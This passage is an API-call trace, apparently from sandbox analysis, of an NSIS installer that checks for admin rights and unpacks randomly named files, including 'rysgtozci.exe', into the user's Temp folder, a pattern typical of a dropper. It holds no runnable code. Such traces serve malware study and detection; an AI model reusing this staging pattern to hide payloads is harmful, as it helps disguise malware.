returned 0x6b950000 [0093.271] GetClassInfoW (in: hInstance=0x0, lpClassName="RichEdit20W", lpWndClass=0x4291c0 | out: lpWndClass=0x4291c0) returned 1 [0093.274] DialogBoxParamW (hInstance=0x400000, lpTemplateName=0x69, hWndParent=0x0, lpDialogFunc=0x403f64, dwInitParam=0x0) returned 0x0 [0094.136] GetDlgItem (hDlg=0x50288, nIDDlgItem=1) returned 0x3025a [0094.136] GetDlgItem (hDlg=0x50288, nIDDlgItem=2) returned 0x2024a [0094.136] SetDlgItemTextW (hDlg=0x50288, nIDDlgItem=1028, lpString="Nullsoft Install System v3.08") returned 1 [0094.136] SetClassLongW (hWnd=0x50288, nIndex=-14, dwNewLong=1704499) returned 0x0 [0094.139] lstrcpynW (in: lpString1=0x4281c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0094.140] lstrlenW (lpString="") returned 0 [0094.140] lstrcpynW (in: lpString1=0x40b5c8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0094.140] lstrcpynW (in: lpString1=0x40bdc8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0094.140] lstrcmpiW (lpString1="", lpString2="") returned 0 [0094.140] lstrcpynW (in: lpString1=0x4281c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0094.140] lstrlenW (lpString="") returned 0 [0094.140] lstrcpynW (in: lpString1=0x62a2ec, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0094.140] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0094.140] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0094.140] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0094.140] GetTickCount () returned 0x13f155d [0094.140] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpPrefixString="nsr", uUnique=0x0, lpTempFileName=0x42b000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr155e.tmp")) returned 0x155e [0094.142] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" [0094.142] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned 48 [0094.142] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" [0094.142] lstrcpynW (in: lpString1=0x425f10, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" [0094.142] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned 48 [0094.142] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr155e.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16f6aa1a, ftCreationTime.dwHighDateTime=0x1d8605e, ftLastAccessTime.dwLowDateTime=0x16f6aa1a, ftLastAccessTime.dwHighDateTime=0x1d8605e, ftLastWriteTime.dwLowDateTime=0x16f6aa1a, ftLastWriteTime.dwHighDateTime=0x1d8605e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsr155E.tmp", cAlternateFileName="")) returned 0x5fe4e0 [0094.143] FindClose (in: hFindFile=0x5fe4e0 | out: hFindFile=0x5fe4e0) returned 1 [0094.143] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr155e.tmp")) returned 1 [0094.143] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" [0094.143] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned 48 [0094.143] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" [0094.143] CreateDirectoryW (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0094.144] GetLastError () returned 0xb7 [0094.144] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0094.144] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0094.144] GetLastError () returned 0xb7 [0094.144] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0094.144] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0094.144] GetLastError () returned 0xb7 [0094.144] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0094.145] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0094.145] GetLastError () returned 0xb7 [0094.145] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0094.145] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0094.145] GetLastError () returned 0xb7 [0094.145] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0094.145] GetModuleHandleA (lpModuleName="SHELL32") returned 0x741b0000 [0094.145] GetProcAddress (hModule=0x741b0000, lpProcName=0x2a8) returned 0x7445db90 [0094.146] IsUserAnAdmin () returned 1 [0094.146] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr155e.tmp"), lpSecurityAttributes=0x19f0d8) returned 1 [0094.146] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" [0094.147] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned 48 [0094.147] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" [0094.147] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned 48 [0094.147] lstrcpynW (in: lpString1=0x438000, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr155E.tmp" [0094.147] lstrcpynW (in: lpString1=0x42b000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0094.148] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0094.148] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0094.148] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0094.148] CreateDirectoryW (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0094.148] GetLastError () returned 0xb7 [0094.148] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0094.148] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0094.148] GetLastError () returned 0xb7 [0094.148] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0094.148] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0094.149] GetLastError () returned 0xb7 [0094.149] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0094.149] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0094.149] GetLastError () returned 0xb7 [0094.149] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0094.149] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0094.149] GetLastError () returned 0xb7 [0094.149] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0094.149] lstrcpynW (in: lpString1=0x436000, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0094.149] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0094.150] lstrcpynW (in: lpString1=0x40bdc8, lpString2="ptcgl43g463vgbr58", iMaxLength=1024 | out: lpString1="ptcgl43g463vgbr58") returned="ptcgl43g463vgbr58" [0094.150] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0094.150] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0094.150] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0094.150] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="ptcgl43g463vgbr58" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptcgl43g463vgbr58") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptcgl43g463vgbr58" [0094.150] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptcgl43g463vgbr58" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ptcgl43g463vgbr58")) returned 0xffffffff [0094.150] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptcgl43g463vgbr58" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ptcgl43g463vgbr58")) returned 0xffffffff [0094.150] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptcgl43g463vgbr58" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ptcgl43g463vgbr58"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0094.151] SetFilePointer (in: hFile=0x210, lDistanceToMove=38379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95eb [0094.151] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0094.151] GetTickCount () returned 0x13f156c [0094.151] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0094.274] GetTickCount () returned 0x13f15e9 [0094.274] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x5625, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x5625, lpOverlapped=0x0) returned 1 [0094.276] GetTickCount () returned 0x13f15e9 [0094.276] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0094.279] GetTickCount () returned 0x13f15e9 [0094.280] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4344, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4344, lpOverlapped=0x0) returned 1 [0094.281] GetTickCount () returned 0x13f15e9 [0094.281] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0094.285] GetTickCount () returned 0x13f15e9 [0094.285] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4472, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4472, lpOverlapped=0x0) returned 1 [0094.288] GetTickCount () returned 0x13f15f9 [0094.288] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0094.293] GetTickCount () returned 0x13f15f9 [0094.293] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4671, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4671, lpOverlapped=0x0) returned 1 [0094.294] GetTickCount () returned 0x13f15f9 [0094.294] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0094.296] GetTickCount () returned 0x13f15f9 [0094.296] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x45b0, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x45b0, lpOverlapped=0x0) returned 1 [0094.297] GetTickCount () returned 0x13f15f9 [0094.297] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0094.300] GetTickCount () returned 0x13f15f9 [0094.300] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x47f4, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x47f4, lpOverlapped=0x0) returned 1 [0094.300] GetTickCount () returned 0x13f15f9 [0094.300] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0094.302] GetTickCount () returned 0x13f1609 [0094.302] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4320, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4320, lpOverlapped=0x0) returned 1 [0094.306] GetTickCount () returned 0x13f1609 [0094.306] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0094.308] GetTickCount () returned 0x13f1609 [0094.308] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x3f13, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x3f13, lpOverlapped=0x0) returned 1 [0094.308] GetTickCount () returned 0x13f1609 [0094.308] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0094.311] GetTickCount () returned 0x13f1609 [0094.311] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x3f1e, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x3f1e, lpOverlapped=0x0) returned 1 [0094.312] GetTickCount () returned 0x13f1609 [0094.312] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0094.314] GetTickCount () returned 0x13f1609 [0094.314] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x3f22, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x3f22, lpOverlapped=0x0) returned 1 [0094.316] GetTickCount () returned 0x13f1609 [0094.316] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x3007, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x3007, lpOverlapped=0x0) returned 1 [0094.318] GetTickCount () returned 0x13f1618 [0094.318] MulDiv (nNumber=176135, nNumerator=100, nDenominator=176135) returned 100 [0094.318] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0094.318] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x319c, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x319c, lpOverlapped=0x0) returned 1 [0094.318] GetTickCount () returned 0x13f1618 [0094.318] MulDiv (nNumber=176135, nNumerator=100, nDenominator=176135) returned 100 [0094.318] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0094.318] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0094.318] CloseHandle (hObject=0x28) returned 1 [0094.323] lstrcpynW (in: lpString1=0x40bdc8, lpString2="wduqqtzg", iMaxLength=1024 | out: lpString1="wduqqtzg") returned="wduqqtzg" [0094.323] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0094.323] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0094.323] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0094.323] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="wduqqtzg" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg" [0094.324] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wduqqtzg")) returned 0xffffffff [0094.324] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wduqqtzg")) returned 0xffffffff [0094.324] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wduqqtzg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wduqqtzg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0094.324] SetFilePointer (in: hFile=0x210, lDistanceToMove=214518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x345f6 [0094.324] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0094.325] GetTickCount () returned 0x13f1618 [0094.325] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0xaa2, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0xaa2, lpOverlapped=0x0) returned 1 [0094.448] GetTickCount () returned 0x13f1695 [0094.448] MulDiv (nNumber=2722, nNumerator=100, nDenominator=2722) returned 100 [0094.448] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0094.448] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x1505, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x1505, lpOverlapped=0x0) returned 1 [0094.450] GetTickCount () returned 0x13f1695 [0094.450] MulDiv (nNumber=2722, nNumerator=100, nDenominator=2722) returned 100 [0094.450] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0094.450] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0094.450] CloseHandle (hObject=0x28) returned 1 [0094.451] lstrcpynW (in: lpString1=0x40bdc8, lpString2="rysgtozci.exe", iMaxLength=1024 | out: lpString1="rysgtozci.exe") returned="rysgtozci.exe" [0094.451] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0094.451] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0094.451] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0094.452] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="rysgtozci.exe" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" [0094.452] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe")) returned 0xffffffff [0094.452] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe")) returned 0xffffffff [0094.452] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0094.455] SetFilePointer (in: hFile=0x210, lDistanceToMove=217244, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3509c [0094.455] ReadFile (in: 